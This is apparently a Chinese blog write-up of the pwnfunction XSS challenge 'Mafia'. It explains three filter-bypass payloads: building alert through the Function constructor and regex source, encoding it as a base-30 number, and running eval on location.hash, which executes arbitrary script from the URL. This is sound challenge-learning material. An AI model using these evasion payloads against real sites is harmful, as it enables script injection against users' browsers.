xss.pwnfunction-Mafia

这个是利用的构造函数 用source来获取构造函数的源码并转化成小写

javascript 复制代码
Function(/ALERT(1337)/.source.toLowerCase())()

parseInt(string, radix)

  • string:要被解析的字符串。
  • radix:解析时使用的基数(进制)。可选参数,默认为10。

用parseint将alert转成进制

这里为什么用30因为在转换进制的时候是0-9其次才是a-z也就是说他在20位加上0-9正好是30

javascript 复制代码
eval(8680439..toString(30))(1337)

"location.hash" 是 JavaScript 中用来获取当前页面 URL 中的锚点(即 # 号后面的部分)的属性。通过访问 "location.hash",你可以获取当前页面 URL 中的锚点信息

"slice" 是 JavaScript 中用来提取字符串中指定部分的方法。

javascript 复制代码
eval(location.hash.slice(1))
相关推荐
轻口味32 分钟前
命名空间与模块化概述
开发语言·前端·javascript
前端小小王1 小时前
React Hooks
前端·javascript·react.js
迷途小码农零零发1 小时前
react中使用ResizeObserver来观察元素的size变化
前端·javascript·react.js
娃哈哈哈哈呀2 小时前
vue中的css深度选择器v-deep 配合!important
前端·css·vue.js
旭东怪2 小时前
EasyPoi 使用$fe:模板语法生成Word动态行
java·前端·word
ekskef_sef4 小时前
32岁前端干了8年,是继续做前端开发,还是转其它工作
前端
sunshine6414 小时前
【CSS】实现tag选中对钩样式
前端·css·css3
真滴book理喻4 小时前
Vue(四)
前端·javascript·vue.js
蜜獾云4 小时前
npm淘宝镜像
前端·npm·node.js